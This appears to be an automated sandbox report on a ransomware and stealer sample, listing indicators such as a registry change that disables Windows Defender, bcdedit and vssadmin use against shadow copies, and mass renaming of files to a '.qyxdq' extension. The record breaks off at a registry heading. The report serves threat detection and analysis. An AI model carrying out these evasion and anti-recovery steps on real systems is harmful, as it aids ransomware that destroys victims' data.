Malware Analysis Report

2024-10-16 03:13

Sample ID 220112-vgqwtsdce7
Target 585900f8de74f4be48011f47c91373a7a4bb97bfc2324144b61e4f4fa8ef4aa5.7z
SHA256 143c286fd4b71174dc7f1764f7758e9b91614c4019686bfb6291c1b31009e4b5
Tags
evasion ransomware spyware stealer trojan
score
10/10

Table of Contents

Analysis Overview

MITRE ATT&CK

Enterprise Matrix V6

Analysis: static1

Detonation Overview

Signatures

Analysis: behavioral1

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral2

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis Overview

score
10/10

SHA256

143c286fd4b71174dc7f1764f7758e9b91614c4019686bfb6291c1b31009e4b5

Threat Level: Known bad

The file 585900f8de74f4be48011f47c91373a7a4bb97bfc2324144b61e4f4fa8ef4aa5.7z was found to be: Known bad.

Malicious Activity Summary

evasion ransomware spyware stealer trojan

Deletes Windows Defender Definitions

Modifies security service

Modifies Windows Defender Real-time Protection settings

Modifies boot configuration data using bcdedit

Clears Windows event logs

Deletes shadow copies

Modifies extensions of user files

Reads user/profile data of web browsers

Drops file in Program Files directory

Launches sc.exe

Interacts with shadow copies

Modifies registry class

Runs net.exe

Suspicious behavior: EnumeratesProcesses

Suspicious use of AdjustPrivilegeToken

Suspicious use of WriteProcessMemory

MITRE ATT&CK

Analysis: static1

Detonation Overview

Reported

2022-01-12 16:57

Signatures

N/A

Analysis: behavioral1

Detonation Overview

Submitted

2022-01-12 16:57

Reported

2022-01-12 16:57

Platform

win7-en-20211208

Command Line

N/A

Signatures

N/A

Processes

N/A

Network

N/A

Files

N/A

Analysis: behavioral2

Detonation Overview

Submitted

2022-01-12 16:57

Reported

2022-01-12 17:03

Platform

win10-en-20211208

Max time kernel

120s

Max time network

142s

Command Line

"C:\Users\Admin\AppData\Local\Temp\585900f8de74f4be48011f47c91373a7a4bb97bfc2324144b61e4f4fa8ef4aa5.exe"

Signatures

Deletes Windows Defender Definitions

evasion
Description Indicator Process Target
N/A N/A C:\Program Files\Windows Defender\MpCmdRun.exe N/A

Modifies Windows Defender Real-time Protection settings

evasion trojan

Modifies security service

evasion
Description Indicator Process Target
Set value (int) \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\WinDefend\Start = "4" C:\Windows\SYSTEM32\reg.exe N/A

Clears Windows event logs

evasion ransomware

Deletes shadow copies

ransomware

Modifies boot configuration data using bcdedit

ransomware evasion
Description Indicator Process Target
N/A N/A C:\Windows\SYSTEM32\bcdedit.exe N/A
N/A N/A C:\Windows\SYSTEM32\bcdedit.exe N/A

Modifies extensions of user files

ransomware
Description Indicator Process Target
File opened for modification C:\Users\Admin\Pictures\CompareExpand.png.o2jKmV9uukpgzUXneR8N3T_sYN0awfNhXsYH6EzzX3f_6GB7ksaEv_I0.qyxdq C:\Users\Admin\AppData\Local\Temp\585900f8de74f4be48011f47c91373a7a4bb97bfc2324144b61e4f4fa8ef4aa5.exe N/A
File renamed C:\Users\Admin\Pictures\MountPop.crw => C:\Users\Admin\Pictures\MountPop.crw.o2jKmV9uukpgzUXneR8N3T_sYN0awfNhXsYH6EzzX3f_6JIKQmrHiCQ0.qyxdq C:\Users\Admin\AppData\Local\Temp\585900f8de74f4be48011f47c91373a7a4bb97bfc2324144b61e4f4fa8ef4aa5.exe N/A
File renamed C:\Users\Admin\Pictures\ResumeDismount.tif => C:\Users\Admin\Pictures\ResumeDismount.tif.o2jKmV9uukpgzUXneR8N3T_sYN0awfNhXsYH6EzzX3f_K0xRAgpUq780.qyxdq C:\Users\Admin\AppData\Local\Temp\585900f8de74f4be48011f47c91373a7a4bb97bfc2324144b61e4f4fa8ef4aa5.exe N/A
File opened for modification C:\Users\Admin\Pictures\ResumeDismount.tif.o2jKmV9uukpgzUXneR8N3T_sYN0awfNhXsYH6EzzX3f_K0xRAgpUq780.qyxdq C:\Users\Admin\AppData\Local\Temp\585900f8de74f4be48011f47c91373a7a4bb97bfc2324144b61e4f4fa8ef4aa5.exe N/A
File opened for modification C:\Users\Admin\Pictures\SavePop.tif.o2jKmV9uukpgzUXneR8N3T_sYN0awfNhXsYH6EzzX3f_5590KtyuY3o0.qyxdq C:\Users\Admin\AppData\Local\Temp\585900f8de74f4be48011f47c91373a7a4bb97bfc2324144b61e4f4fa8ef4aa5.exe N/A
File opened for modification C:\Users\Admin\Pictures\SendMeasure.crw.o2jKmV9uukpgzUXneR8N3T_sYN0awfNhXsYH6EzzX3f_r0cfxxes4Kc0.qyxdq C:\Users\Admin\AppData\Local\Temp\585900f8de74f4be48011f47c91373a7a4bb97bfc2324144b61e4f4fa8ef4aa5.exe N/A
File renamed C:\Users\Admin\Pictures\SetSuspend.raw => C:\Users\Admin\Pictures\SetSuspend.raw.o2jKmV9uukpgzUXneR8N3T_sYN0awfNhXsYH6EzzX3f_kBaj8j5Y5WE0.qyxdq C:\Users\Admin\AppData\Local\Temp\585900f8de74f4be48011f47c91373a7a4bb97bfc2324144b61e4f4fa8ef4aa5.exe N/A
File opened for modification C:\Users\Admin\Pictures\SetSuspend.raw.o2jKmV9uukpgzUXneR8N3T_sYN0awfNhXsYH6EzzX3f_kBaj8j5Y5WE0.qyxdq C:\Users\Admin\AppData\Local\Temp\585900f8de74f4be48011f47c91373a7a4bb97bfc2324144b61e4f4fa8ef4aa5.exe N/A
File opened for modification C:\Users\Admin\Pictures\MountPop.crw.o2jKmV9uukpgzUXneR8N3T_sYN0awfNhXsYH6EzzX3f_6JIKQmrHiCQ0.qyxdq C:\Users\Admin\AppData\Local\Temp\585900f8de74f4be48011f47c91373a7a4bb97bfc2324144b61e4f4fa8ef4aa5.exe N/A
File renamed C:\Users\Admin\Pictures\SavePop.tif => C:\Users\Admin\Pictures\SavePop.tif.o2jKmV9uukpgzUXneR8N3T_sYN0awfNhXsYH6EzzX3f_5590KtyuY3o0.qyxdq C:\Users\Admin\AppData\Local\Temp\585900f8de74f4be48011f47c91373a7a4bb97bfc2324144b61e4f4fa8ef4aa5.exe N/A
File renamed C:\Users\Admin\Pictures\UnregisterMount.tiff => C:\Users\Admin\Pictures\UnregisterMount.tiff.o2jKmV9uukpgzUXneR8N3T_sYN0awfNhXsYH6EzzX3f_nHIvmUesmaM0.qyxdq C:\Users\Admin\AppData\Local\Temp\585900f8de74f4be48011f47c91373a7a4bb97bfc2324144b61e4f4fa8ef4aa5.exe N/A
File opened for modification C:\Users\Admin\Pictures\UnregisterMount.tiff.o2jKmV9uukpgzUXneR8N3T_sYN0awfNhXsYH6EzzX3f_nHIvmUesmaM0.qyxdq C:\Users\Admin\AppData\Local\Temp\585900f8de74f4be48011f47c91373a7a4bb97bfc2324144b61e4f4fa8ef4aa5.exe N/A
File renamed C:\Users\Admin\Pictures\CompareExpand.png => C:\Users\Admin\Pictures\CompareExpand.png.o2jKmV9uukpgzUXneR8N3T_sYN0awfNhXsYH6EzzX3f_6GB7ksaEv_I0.qyxdq C:\Users\Admin\AppData\Local\Temp\585900f8de74f4be48011f47c91373a7a4bb97bfc2324144b61e4f4fa8ef4aa5.exe N/A
File renamed C:\Users\Admin\Pictures\SendMeasure.crw => C:\Users\Admin\Pictures\SendMeasure.crw.o2jKmV9uukpgzUXneR8N3T_sYN0awfNhXsYH6EzzX3f_r0cfxxes4Kc0.qyxdq C:\Users\Admin\AppData\Local\Temp\585900f8de74f4be48011f47c91373a7a4bb97bfc2324144b61e4f4fa8ef4aa5.exe N/A

Reads user/profile data of web browsers

spyware stealer

Drops file in Program Files directory

Description Indicator Process Target
File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\tracked-send\js\plugins\tracked-send\js\nls\ro-ro\ui-strings.js.o2jKmV9uukpgzUXneR8N3T_sYN0awfNhXsYH6EzzX3f_GVZA-U2Vz0g0.qyxdq C:\Users\Admin\AppData\Local\Temp\585900f8de74f4be48011f47c91373a7a4bb97bfc2324144b61e4f4fa8ef4aa5.exe N/A
File opened for modification C:\Program Files\Common Files\microsoft shared\ink\hwrlatinlm.dat C:\Users\Admin\AppData\Local\Temp\585900f8de74f4be48011f47c91373a7a4bb97bfc2324144b61e4f4fa8ef4aa5.exe N/A
File opened for modification C:\Program Files\WindowsApps\Microsoft.Getstarted_4.5.6.0_x64__8wekyb3d8bbwe\Content\desktop\en-GB\doc_offline_speechrecognition.xml C:\Users\Admin\AppData\Local\Temp\585900f8de74f4be48011f47c91373a7a4bb97bfc2324144b61e4f4fa8ef4aa5.exe N/A
File opened for modification C:\Program Files\WindowsApps\Microsoft.MicrosoftSolitaireCollection_3.14.1181.0_x64__8wekyb3d8bbwe\Arkadium.Win10.News\Assets\News_icon-press.png C:\Users\Admin\AppData\Local\Temp\585900f8de74f4be48011f47c91373a7a4bb97bfc2324144b61e4f4fa8ef4aa5.exe N/A
File opened for modification C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_17.7906.42257.0_x64__8wekyb3d8bbwe\images\HxMailAppList.targetsize-24.png C:\Users\Admin\AppData\Local\Temp\585900f8de74f4be48011f47c91373a7a4bb97bfc2324144b61e4f4fa8ef4aa5.exe N/A
File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\org.eclipse.equinox.p2.engine.nl_ja_4.4.0.v20140623020002.jar.o2jKmV9uukpgzUXneR8N3T_sYN0awfNhXsYH6EzzX3f_ZMzZH13gQKc0.qyxdq C:\Users\Admin\AppData\Local\Temp\585900f8de74f4be48011f47c91373a7a4bb97bfc2324144b61e4f4fa8ef4aa5.exe N/A
File opened for modification C:\Program Files\WindowsApps\Microsoft.XboxApp_25.25.13009.0_x64__8wekyb3d8bbwe\Assets\GamesXboxHubAppList.scale-100_contrast-white.png C:\Users\Admin\AppData\Local\Temp\585900f8de74f4be48011f47c91373a7a4bb97bfc2324144b61e4f4fa8ef4aa5.exe N/A
File opened for modification C:\Program Files\WindowsApps\Microsoft.Office.OneNote_17.7668.58071.0_x64__8wekyb3d8bbwe\images\OneNoteNotebookWideTile.scale-200.png C:\Users\Admin\AppData\Local\Temp\585900f8de74f4be48011f47c91373a7a4bb97bfc2324144b61e4f4fa8ef4aa5.exe N/A
File opened for modification C:\Program Files\WindowsApps\Microsoft.XboxApp_25.25.13009.0_x64__8wekyb3d8bbwe\Assets\GamesXboxHubAppList.targetsize-60_altform-unplated.png C:\Users\Admin\AppData\Local\Temp\585900f8de74f4be48011f47c91373a7a4bb97bfc2324144b61e4f4fa8ef4aa5.exe N/A
File opened for modification C:\Program Files\Microsoft Office\root\Licenses16\ProfessionalPipcR_OEM_Perp-pl.xrm-ms.o2jKmV9uukpgzUXneR8N3T_sYN0awfNhXsYH6EzzX3f_JZtbMc7HnPY0.qyxdq C:\Users\Admin\AppData\Local\Temp\585900f8de74f4be48011f47c91373a7a4bb97bfc2324144b61e4f4fa8ef4aa5.exe N/A
File opened for modification C:\Program Files\WindowsApps\Microsoft.WindowsFeedbackHub_1.1612.10312.0_x64__8wekyb3d8bbwe\Assets\InsiderHubAppList.targetsize-24.png C:\Users\Admin\AppData\Local\Temp\585900f8de74f4be48011f47c91373a7a4bb97bfc2324144b61e4f4fa8ef4aa5.exe N/A
File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\tracked-send\js\plugins\tracked-send\js\nls\ui-strings.js.o2jKmV9uukpgzUXneR8N3T_sYN0awfNhXsYH6EzzX3f_M5DWBNETB2E0.qyxdq C:\Users\Admin\AppData\Local\Temp\585900f8de74f4be48011f47c91373a7a4bb97bfc2324144b61e4f4fa8ef4aa5.exe N/A
File opened for modification C:\Program Files\WindowsApps\Microsoft.MicrosoftOfficeHub_17.8010.5926.0_x64__8wekyb3d8bbwe\office.odf C:\Users\Admin\AppData\Local\Temp\585900f8de74f4be48011f47c91373a7a4bb97bfc2324144b61e4f4fa8ef4aa5.exe N/A
File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\com.jrockit.mc.browser.jdp_5.5.0.165303.jar.o2jKmV9uukpgzUXneR8N3T_sYN0awfNhXsYH6EzzX3f_l2CpazntrnM0.qyxdq C:\Users\Admin\AppData\Local\Temp\585900f8de74f4be48011f47c91373a7a4bb97bfc2324144b61e4f4fa8ef4aa5.exe N/A
File opened for modification C:\Program Files\WindowsApps\Microsoft.WindowsAlarms_10.1702.333.0_x64__8wekyb3d8bbwe\Assets\AlarmsAppList.contrast-black_targetsize-40.png C:\Users\Admin\AppData\Local\Temp\585900f8de74f4be48011f47c91373a7a4bb97bfc2324144b61e4f4fa8ef4aa5.exe N/A
File opened for modification C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_17.7906.42257.0_x64__8wekyb3d8bbwe\images\contrast-black\OutlookMailWideTile.scale-400.png C:\Users\Admin\AppData\Local\Temp\585900f8de74f4be48011f47c91373a7a4bb97bfc2324144b61e4f4fa8ef4aa5.exe N/A
File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\scan-files\images\themeless\Playstore\sk_get.svg.o2jKmV9uukpgzUXneR8N3T_sYN0awfNhXsYH6EzzX3f_j_OyvQUFxOU0.qyxdq C:\Users\Admin\AppData\Local\Temp\585900f8de74f4be48011f47c91373a7a4bb97bfc2324144b61e4f4fa8ef4aa5.exe N/A
File opened for modification C:\Program Files\Java\jre1.8.0_66\lib\deploy\messages_de.properties.o2jKmV9uukpgzUXneR8N3T_sYN0awfNhXsYH6EzzX3f_iCwJqb30dAo0.qyxdq C:\Users\Admin\AppData\Local\Temp\585900f8de74f4be48011f47c91373a7a4bb97bfc2324144b61e4f4fa8ef4aa5.exe N/A
File opened for modification C:\Program Files\Microsoft Office\root\Licenses16\O365HomePremR_Subscription1-ppd.xrm-ms.o2jKmV9uukpgzUXneR8N3T_sYN0awfNhXsYH6EzzX3f_yT3JK66WiiQ0.qyxdq C:\Users\Admin\AppData\Local\Temp\585900f8de74f4be48011f47c91373a7a4bb97bfc2324144b61e4f4fa8ef4aa5.exe N/A
File opened for modification C:\Program Files\WindowsApps\Microsoft.MicrosoftSolitaireCollection_3.14.1181.0_x64__8wekyb3d8bbwe\Assets\Themes\Jumbo\mask\1s.png C:\Users\Admin\AppData\Local\Temp\585900f8de74f4be48011f47c91373a7a4bb97bfc2324144b61e4f4fa8ef4aa5.exe N/A
File opened for modification C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_17.7906.42257.0_x64__8wekyb3d8bbwe\images\contrast-white\HxMailSplashLogo.scale-200.png C:\Users\Admin\AppData\Local\Temp\585900f8de74f4be48011f47c91373a7a4bb97bfc2324144b61e4f4fa8ef4aa5.exe N/A
File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\sign-services-auth\js\nls\zh-cn\ui-strings.js.o2jKmV9uukpgzUXneR8N3T_sYN0awfNhXsYH6EzzX3f_BxiGJU8i0J00.qyxdq C:\Users\Admin\AppData\Local\Temp\585900f8de74f4be48011f47c91373a7a4bb97bfc2324144b61e4f4fa8ef4aa5.exe N/A
File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\unified-share\images\themes\dark\Info.png.o2jKmV9uukpgzUXneR8N3T_sYN0awfNhXsYH6EzzX3f_XhQV15T99t00.qyxdq C:\Users\Admin\AppData\Local\Temp\585900f8de74f4be48011f47c91373a7a4bb97bfc2324144b61e4f4fa8ef4aa5.exe N/A
File opened for modification C:\Program Files\Microsoft Office\root\Licenses16\StandardR_Trial-ul-oob.xrm-ms.o2jKmV9uukpgzUXneR8N3T_sYN0awfNhXsYH6EzzX3f_72A3JKQicFg0.qyxdq C:\Users\Admin\AppData\Local\Temp\585900f8de74f4be48011f47c91373a7a4bb97bfc2324144b61e4f4fa8ef4aa5.exe N/A
File opened for modification C:\Program Files\WindowsApps\Microsoft.MicrosoftSolitaireCollection_3.14.1181.0_x64__8wekyb3d8bbwe\Assets\GamePlayAssets\Localization\localized_SL-SL.respack C:\Users\Admin\AppData\Local\Temp\585900f8de74f4be48011f47c91373a7a4bb97bfc2324144b61e4f4fa8ef4aa5.exe N/A
File opened for modification C:\Program Files\WindowsApps\Microsoft.Office.OneNote_17.7668.58071.0_x64__8wekyb3d8bbwe\images\contrast-black\OneNoteNotebookWideTile.scale-200.png C:\Users\Admin\AppData\Local\Temp\585900f8de74f4be48011f47c91373a7a4bb97bfc2324144b61e4f4fa8ef4aa5.exe N/A
File opened for modification C:\Program Files\WindowsApps\Microsoft.SkypeApp_11.8.204.0_x64__kzf8qxf38zg5c\SkypeApp\Designs\Flags\large\be_60x42.png C:\Users\Admin\AppData\Local\Temp\585900f8de74f4be48011f47c91373a7a4bb97bfc2324144b61e4f4fa8ef4aa5.exe N/A
File opened for modification C:\Program Files\Microsoft Office\root\Licenses16\O365HomePremR_SubTest1-ppd.xrm-ms.o2jKmV9uukpgzUXneR8N3T_sYN0awfNhXsYH6EzzX3f_C3wg89h_d9g0.qyxdq C:\Users\Admin\AppData\Local\Temp\585900f8de74f4be48011f47c91373a7a4bb97bfc2324144b61e4f4fa8ef4aa5.exe N/A
File opened for modification C:\Program Files\WindowsApps\Microsoft.WindowsCalculator_10.1702.312.0_x64__8wekyb3d8bbwe\microsoft.system.package.metadata\resources.4919d9c8.pri C:\Users\Admin\AppData\Local\Temp\585900f8de74f4be48011f47c91373a7a4bb97bfc2324144b61e4f4fa8ef4aa5.exe N/A
File opened for modification C:\Program Files\WindowsApps\Microsoft.WindowsMaps_5.1611.10393.0_x64__8wekyb3d8bbwe\Assets\SecondaryTiles\Work\contrast-white\LargeTile.scale-200.png C:\Users\Admin\AppData\Local\Temp\585900f8de74f4be48011f47c91373a7a4bb97bfc2324144b61e4f4fa8ef4aa5.exe N/A
File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\on-boarding\images\themeless\be_get.svg.o2jKmV9uukpgzUXneR8N3T_sYN0awfNhXsYH6EzzX3f_e6dRcpg6sGU0.qyxdq C:\Users\Admin\AppData\Local\Temp\585900f8de74f4be48011f47c91373a7a4bb97bfc2324144b61e4f4fa8ef4aa5.exe N/A
File opened for modification C:\Program Files\Microsoft Office\root\Office16\MEDIA\CLICK.WAV.o2jKmV9uukpgzUXneR8N3T_sYN0awfNhXsYH6EzzX3f_Ki98VRu7Rbs0.qyxdq C:\Users\Admin\AppData\Local\Temp\585900f8de74f4be48011f47c91373a7a4bb97bfc2324144b61e4f4fa8ef4aa5.exe N/A
File opened for modification C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_17.7906.42257.0_x64__8wekyb3d8bbwe\images\contrast-black\HxA-Outlook.scale-100.png C:\Users\Admin\AppData\Local\Temp\585900f8de74f4be48011f47c91373a7a4bb97bfc2324144b61e4f4fa8ef4aa5.exe N/A
File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\Tracker\server_ok.gif.o2jKmV9uukpgzUXneR8N3T_sYN0awfNhXsYH6EzzX3f_Rjvbg1IkPRg0.qyxdq C:\Users\Admin\AppData\Local\Temp\585900f8de74f4be48011f47c91373a7a4bb97bfc2324144b61e4f4fa8ef4aa5.exe N/A
File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-files\images\icons_retina.png.o2jKmV9uukpgzUXneR8N3T_sYN0awfNhXsYH6EzzX3f_CqU1y1UvlH40.qyxdq C:\Users\Admin\AppData\Local\Temp\585900f8de74f4be48011f47c91373a7a4bb97bfc2324144b61e4f4fa8ef4aa5.exe N/A
File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\desktop-connector-files\css\main-selector.css.o2jKmV9uukpgzUXneR8N3T_sYN0awfNhXsYH6EzzX3f_HRAStiYWHr00.qyxdq C:\Users\Admin\AppData\Local\Temp\585900f8de74f4be48011f47c91373a7a4bb97bfc2324144b61e4f4fa8ef4aa5.exe N/A
File opened for modification C:\Program Files\Java\jdk1.8.0_66\jre\lib\fontconfig.properties.src.o2jKmV9uukpgzUXneR8N3T_sYN0awfNhXsYH6EzzX3f_TTpF1kBYI1I0.qyxdq C:\Users\Admin\AppData\Local\Temp\585900f8de74f4be48011f47c91373a7a4bb97bfc2324144b61e4f4fa8ef4aa5.exe N/A
File opened for modification C:\Program Files\Microsoft Office\root\Licenses16\HomeStudentDemoR_BypassTrial180-ppd.xrm-ms.o2jKmV9uukpgzUXneR8N3T_sYN0awfNhXsYH6EzzX3f_2h-YKaDKitQ0.qyxdq C:\Users\Admin\AppData\Local\Temp\585900f8de74f4be48011f47c91373a7a4bb97bfc2324144b61e4f4fa8ef4aa5.exe N/A
File opened for modification C:\Program Files\WindowsApps\Microsoft.3DBuilder_13.0.10349.0_x64__8wekyb3d8bbwe\Assets\EmbossBitmaps\Multiply.png C:\Users\Admin\AppData\Local\Temp\585900f8de74f4be48011f47c91373a7a4bb97bfc2324144b61e4f4fa8ef4aa5.exe N/A
File opened for modification C:\Program Files\WindowsApps\Microsoft.XboxSpeechToTextOverlay_1.14.2002.0_neutral_split.scale-100_8wekyb3d8bbwe\Assets\GamesXboxHubWideTile.scale-100.png C:\Users\Admin\AppData\Local\Temp\585900f8de74f4be48011f47c91373a7a4bb97bfc2324144b61e4f4fa8ef4aa5.exe N/A
File opened for modification C:\Program Files\Microsoft Office\root\Document Themes 16\Wisp.thmx.o2jKmV9uukpgzUXneR8N3T_sYN0awfNhXsYH6EzzX3f_OV2_b6VsX180.qyxdq C:\Users\Admin\AppData\Local\Temp\585900f8de74f4be48011f47c91373a7a4bb97bfc2324144b61e4f4fa8ef4aa5.exe N/A
File opened for modification C:\Program Files\WindowsApps\DeletedAllUserPackages\Microsoft.WindowsMaps_5.1611.10393.0_neutral_split.scale-125_8wekyb3d8bbwe\Assets\SecondaryTiles\Work\contrast-black\SmallTile.scale-125.png C:\Users\Admin\AppData\Local\Temp\585900f8de74f4be48011f47c91373a7a4bb97bfc2324144b61e4f4fa8ef4aa5.exe N/A
File opened for modification C:\Program Files\WindowsApps\DeletedAllUserPackages\Microsoft.ZuneMusic_10.16112.11621.0_neutral_resources.scale-125_8wekyb3d8bbwe\Assets\SplashScreen.scale-125.png C:\Users\Admin\AppData\Local\Temp\585900f8de74f4be48011f47c91373a7a4bb97bfc2324144b61e4f4fa8ef4aa5.exe N/A
File opened for modification C:\Program Files\WindowsApps\Microsoft.WindowsFeedbackHub_1.1612.10312.0_x64__8wekyb3d8bbwe\Assets\InsiderHubSplashWideTile.scale-200.png C:\Users\Admin\AppData\Local\Temp\585900f8de74f4be48011f47c91373a7a4bb97bfc2324144b61e4f4fa8ef4aa5.exe N/A
File opened for modification C:\Program Files\7-Zip\Lang\kaa.txt.o2jKmV9uukpgzUXneR8N3T_sYN0awfNhXsYH6EzzX3f_vdOfwAflIFg0.qyxdq C:\Users\Admin\AppData\Local\Temp\585900f8de74f4be48011f47c91373a7a4bb97bfc2324144b61e4f4fa8ef4aa5.exe N/A
File opened for modification C:\Program Files\WindowsApps\Microsoft.3DBuilder_13.0.10349.0_x64__8wekyb3d8bbwe\Assets\Catalog\shape_torus.3mf C:\Users\Admin\AppData\Local\Temp\585900f8de74f4be48011f47c91373a7a4bb97bfc2324144b61e4f4fa8ef4aa5.exe N/A
File opened for modification C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_17.7906.42257.0_x64__8wekyb3d8bbwe\images\HxA-Yahoo-Dark.scale-400.png C:\Users\Admin\AppData\Local\Temp\585900f8de74f4be48011f47c91373a7a4bb97bfc2324144b61e4f4fa8ef4aa5.exe N/A
File opened for modification C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_17.7906.42257.0_x64__8wekyb3d8bbwe\images\HxMailSplashLogo.scale-200.png C:\Users\Admin\AppData\Local\Temp\585900f8de74f4be48011f47c91373a7a4bb97bfc2324144b61e4f4fa8ef4aa5.exe N/A
File opened for modification C:\Program Files\WindowsApps\Microsoft.3DBuilder_13.0.10349.0_x64__8wekyb3d8bbwe\Assets\Catalog\traintrackstraight.3mf C:\Users\Admin\AppData\Local\Temp\585900f8de74f4be48011f47c91373a7a4bb97bfc2324144b61e4f4fa8ef4aa5.exe N/A
File opened for modification C:\Program Files\7-Zip\Lang\an.txt.o2jKmV9uukpgzUXneR8N3T_sYN0awfNhXsYH6EzzX3f_42-cYeJ6L480.qyxdq C:\Users\Admin\AppData\Local\Temp\585900f8de74f4be48011f47c91373a7a4bb97bfc2324144b61e4f4fa8ef4aa5.exe N/A
File opened for modification C:\Program Files\WindowsApps\DeletedAllUserPackages\Microsoft.WindowsCalculator_10.1702.312.0_neutral_split.scale-125_8wekyb3d8bbwe\Assets\CalculatorWideTile.contrast-white_scale-125.png C:\Users\Admin\AppData\Local\Temp\585900f8de74f4be48011f47c91373a7a4bb97bfc2324144b61e4f4fa8ef4aa5.exe N/A
File opened for modification C:\Program Files\WindowsApps\Microsoft.Messaging_3.26.24002.0_x64__8wekyb3d8bbwe\Assets\starttile.dualsim1.surprise.small.scale-200.png C:\Users\Admin\AppData\Local\Temp\585900f8de74f4be48011f47c91373a7a4bb97bfc2324144b61e4f4fa8ef4aa5.exe N/A
File opened for modification C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_17.7906.42257.0_x64__8wekyb3d8bbwe\images\HxCalendarLargeTile.scale-400.png C:\Users\Admin\AppData\Local\Temp\585900f8de74f4be48011f47c91373a7a4bb97bfc2324144b61e4f4fa8ef4aa5.exe N/A
File opened for modification C:\Program Files\Microsoft Office\root\Licenses16\Standard2019R_Retail-ppd.xrm-ms.o2jKmV9uukpgzUXneR8N3T_sYN0awfNhXsYH6EzzX3f_xBs4EKiku8g0.qyxdq C:\Users\Admin\AppData\Local\Temp\585900f8de74f4be48011f47c91373a7a4bb97bfc2324144b61e4f4fa8ef4aa5.exe N/A
File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\A12_Spinner_int.gif.o2jKmV9uukpgzUXneR8N3T_sYN0awfNhXsYH6EzzX3f_9eylwZfPFDo0.qyxdq C:\Users\Admin\AppData\Local\Temp\585900f8de74f4be48011f47c91373a7a4bb97bfc2324144b61e4f4fa8ef4aa5.exe N/A
File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\activity-badge\js\nls\da-dk\ui-strings.js.o2jKmV9uukpgzUXneR8N3T_sYN0awfNhXsYH6EzzX3f_EpH6PuQFQ6E0.qyxdq C:\Users\Admin\AppData\Local\Temp\585900f8de74f4be48011f47c91373a7a4bb97bfc2324144b61e4f4fa8ef4aa5.exe N/A
File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\com.jrockit.mc.rcp.application_5.5.0.165303.jar.o2jKmV9uukpgzUXneR8N3T_sYN0awfNhXsYH6EzzX3f_iNmPl8M6IBI0.qyxdq C:\Users\Admin\AppData\Local\Temp\585900f8de74f4be48011f47c91373a7a4bb97bfc2324144b61e4f4fa8ef4aa5.exe N/A
File opened for modification C:\Program Files\Microsoft Office\root\Licenses16\Publisher2019R_Trial-pl.xrm-ms.o2jKmV9uukpgzUXneR8N3T_sYN0awfNhXsYH6EzzX3f_Ty41jXjB9ck0.qyxdq C:\Users\Admin\AppData\Local\Temp\585900f8de74f4be48011f47c91373a7a4bb97bfc2324144b61e4f4fa8ef4aa5.exe N/A
File opened for modification C:\Program Files\WindowsApps\Microsoft.Office.OneNote_17.7668.58071.0_x64__8wekyb3d8bbwe\images\OneNoteAppList.targetsize-60_altform-unplated.png C:\Users\Admin\AppData\Local\Temp\585900f8de74f4be48011f47c91373a7a4bb97bfc2324144b61e4f4fa8ef4aa5.exe N/A
File opened for modification C:\Program Files\WindowsApps\Microsoft.Office.OneNote_17.7668.58071.0_x64__8wekyb3d8bbwe\sr-cyrl-cs\mso.acl C:\Users\Admin\AppData\Local\Temp\585900f8de74f4be48011f47c91373a7a4bb97bfc2324144b61e4f4fa8ef4aa5.exe N/A
File opened for modification C:\Program Files\WindowsApps\Microsoft.3DBuilder_13.0.10349.0_neutral_split.scale-180_8wekyb3d8bbwe\Assets\Office\BooleanIntersect.scale-180.png C:\Users\Admin\AppData\Local\Temp\585900f8de74f4be48011f47c91373a7a4bb97bfc2324144b61e4f4fa8ef4aa5.exe N/A
File opened for modification C:\Program Files\WindowsApps\Microsoft.MSPaint_1.1702.28017.0_x64__8wekyb3d8bbwe\Assets\Images\Stickers\Sticker_Cloud.png C:\Users\Admin\AppData\Local\Temp\585900f8de74f4be48011f47c91373a7a4bb97bfc2324144b61e4f4fa8ef4aa5.exe N/A
File opened for modification C:\Program Files\WindowsApps\Microsoft.MicrosoftSolitaireCollection_3.14.1181.0_x64__8wekyb3d8bbwe\Assets\Awards\challenge\Go-for_the_Gold_.png C:\Users\Admin\AppData\Local\Temp\585900f8de74f4be48011f47c91373a7a4bb97bfc2324144b61e4f4fa8ef4aa5.exe N/A
File opened for modification C:\Program Files\WindowsApps\Microsoft.MicrosoftSolitaireCollection_3.14.1181.0_x64__8wekyb3d8bbwe\Assets\StarClub\challenge_freecell.jpg C:\Users\Admin\AppData\Local\Temp\585900f8de74f4be48011f47c91373a7a4bb97bfc2324144b61e4f4fa8ef4aa5.exe N/A

Launches sc.exe

Interacts with shadow copies

ransomware
Description Indicator Process Target
N/A N/A C:\Windows\SYSTEM32\vssadmin.exe N/A

Modifies registry class

Description Indicator Process Target
